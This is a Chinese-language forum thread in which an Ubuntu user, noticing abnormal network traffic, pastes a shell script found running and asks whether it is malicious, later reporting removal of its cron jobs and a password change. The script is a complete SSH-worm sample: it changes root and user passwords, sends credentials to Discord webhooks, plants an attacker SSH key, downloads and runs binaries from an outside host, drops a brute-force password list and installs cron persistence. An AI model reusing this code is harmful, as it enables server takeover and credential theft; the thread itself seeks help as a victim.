您尚未登录。

楼主 # 2023-02-23 10:18:01

zjswuyunbo
会员
注册时间: 2022-08-30
已发帖子: 21
积分: 101

ubuntu有大量异常的网络数据,ps查找进程时,发现如下脚本,这个脚本是恶意的吗?

#!/bin/bash

#########################################################
#########################################################
cd /var/tmp/.update-logs >/dev/null 2>&1
sleep 1
curl --socks5 proxy:hypekebap@arhivehaceru.com:1080 discord.com

if [ $(id -u) = 0 ]; then
usermod -p '$1$RZY$KVZ7I.m2YqYQK87d3txab1' root
else
user=`whoami`
pass=`date +%s | sha256sum | base64 | head -c 8 ; echo`
ip=`curl ifconfig.me`
cores=`nproc`

echo -e "$user\n$pass\n$pass" | passwd ; echo -e "$user123\n$pass\n$pass" | passwd ; echo -e "$user123456\n$pass\n$pass" | passwd ; echo -e "123456\n$pass\n$pass" | passwd ; echo -e "123\n$pass\n$pass" | passwd ; echo -e "111111\n$pass\n$pass" | passwd ; echo -e "1qaz@WSX\n$pass\n$pass" | passwd ; echo -e "password\n$pass\n$pass" | passwd ; echo -e "P@ssw0rd\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd ; echo -e "1234567890\n$pass\n$pass" | passwd

echo '
	{
	  "content": null,
	  "embeds": [
		{
		  "title": "[ SSH ] Password has been changed",
		"description": "[ IP ] '$ip'\n[+] [ User ] '$user' \n[+] [ Password ] '$pass' \n [+] [ Procesoare ] '$cores'",
		  "color": 1337
		}
	  ]
	}
	' > /tmp/.send.json
url='https://discord.com/api/webhooks/1048557019931607130/Uw-AJ_yDvDCYhmFUkjiGTgeLWX6QSPXmg8bc4u4tGyBlDZDq2QpXLSDeFpOynBAcjKxY'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi

#########################################################
#########################################################
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAoBjnno5GBoIuIYIhrJsQxF6OPHtAbOUIEFB+gdfb1tUTjs+f9zCMGkmNmH45fYVukw6IwmhTZ+AcD3eDpgsTloqmVgcXDUmvjWR/fNiImmgU9wlw/lalf/WrIuCDp0PArQtjNg/vo7HUGq9SrEIE2jvyVW59mvoYOwfnDLUiguKZirZgpjZF2DDKK6WpZVTVpKcH+HEFdmFAqJInem/CRUE0bqjMr88bUyDjVw9FtJ5EmQenctjrFVaB7hswOaJBmFQmn9G/BXkMvZ6mX7LzCUM2PVHnVfVeCLdwiOINikzW9qzlr8WoHw4qEGJLuQBWXjJu+m2+FdaOD6PL53nY3w== ElPatrono1337' >> ~/.ssh/authorized_keys && chmod -R go= ~/.ssh

rm -rf /etc/sysctl.conf >/dev/null 2>&1 ; echo "fs.file-max = 2097152" > /etc/sysctl.conf >/dev/null 2>&1 ; sysctl -p >/dev/null 2>&1 ; ulimit -Hn >/dev/null 2>&1 ; ulimit -n 99999 -u 999999 >/dev/null 2>&1


if [ -f Chrome ]; then
	:
	else
	wget -q arhivehaceru.com/.x/Chrome --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/Chrome 
	chmod 777 Chrome
fi
if [ -f aliases ]; then
	:
	else
	wget -q arhivehaceru.com/.x/aliases --no-check-certificate || curl -s -L -O arhivehaceru.com/.x/aliases
	chmod 777 aliases
echo '
	{
	  "content": null,
	  "embeds": [
		{
		  "title": "",
		"description": "Infected Secure Server Shell [ SSH ] on '$(curl ifconfig.me)'",
		  "color": 1337
		}
	  ]
	}
	' > /tmp/.send.json
url='https://discord.com/api/webhooks/1036225255049531422/qyOrT3SxHaOC-9yS2NQiPxlSMYmRFFIpU-rMKzmcDv9pQyP4uaZEiZXDXioUtf0DJLUB'
curl --connect-timeout 15 -H "Content-Type: application/json" --data @/tmp/.send.json $url >/dev/null 2>&1
fi
if [ -f protocols ]; then
	:
	else
	echo 'YWRtaW4gMTIzNAphZG1pbiAxMjM0NTYKYWRtaW4gYWRtaW4KYWRtaW4gYWRtaW4xMjMKYWRtaW4gcGFzc3dvcmQKY2VudG9zIDEyMzQ1NgpjZW50b3MgY2VudG9zCmRlZmF1bHQgMQpndWVzdCBndWVzdApwaSBwaQpwaSByYXNwYmVycnkKZGViaWFudXNlciAxcWF6WFNXQApyb290IDEKcm9vdCAxMjMKcm9vdCAxMjM0NTYKcm9vdCAxMjM0NTY3ODkwCnJvb3QgQWExMjM0NTYKcm9vdCBhZG1pbgpyb290IHBhc3N3b3JkCnJvb3QgcEBzc3cwcmQKcm9vdCBQQHNzdzByZApyb290IHJvb3QKdGVzdCB0ZXN0CnVibnQgdWJudAp1c2VyIHVzZXIKcm9vdCBBZG1pbkAxMjMKdGVzdCAxMjM0NTYKdGVzdCB0ZXN0CmdpdCBnaXQKZ2l0IDEyMzQ1NgpndWVzdCBndWVzdAp1YnVudHUgdWJ1bnR1CnVidW50dSAxMjM0NTYKZ3Vlc3QgMTIzNDU2CnJvb3QgdG9vcgo=' | base64 -d > /var/tmp/.update-logs/protocols
fi
#########################################################
#########################################################

crontablegend() {  
locatie="$(pwd)"
if ! crontab -l | grep -q 'Update'; then
   rm -rf /var/tmp/.update-logs/.5p4rk3l5
   echo "@daily /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "@reboot /var/tmp/.update-logs/./Update" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "* * * * * /var/tmp/.update-logs/./History" >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   echo "@monthly /var/tmp/.update-logs/./Update " >> /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   crontab /var/tmp/.update-logs/.5p4rk3l5
   sleep 1
   source ~/.bashrc >/dev/null 2>&1
   rm -rf /var/tmp/.update-logs/.5p4rk3l5
fi
}
#########################################################
#########################################################

crontablegend
sleep 0.5
wait
#########################################################
#########################################################
RANGE=244
number=$RANDOM
number1=$RANDOM
let "number %= $RANGE"
let "number1 %= $RANGE"
./Chrome $number.$number1 22 > /dev/null 2>&1 
sleep 1
cat bios.txt | sort | uniq > ips
cat ips > bios.txt
./aliases > /dev/null 2>&1 
sleep 2
rm -rf bios.txt ips
pkill aliases
pkill -STOP aliases
pkill Chrome
pkill -STOP Chrome
sleep 3
./Update </dev/null &>/dev/null & disown -h %1
#########################################################

离线

楼主 #3 2023-02-24 09:05:56

zjswuyunbo
会员
注册时间: 2022-08-30
已发帖子: 21
积分: 101

Re: ubuntu有大量异常的网络数据,ps查找进程时,发现如下脚本,这个脚本是恶意的吗?

把脚本里自动创建的定时任务删除了,账户密码修改了,目前还未发现异常

离线

页脚

工信部备案:粤ICP备20025096号 Powered by FluxBB

感谢为中文互联网持续输出优质内容的各位老铁们。 QQ: 516333132, 微信(wechat): whycan_cn (哇酷网/挖坑网/填坑网) service@whycan.cn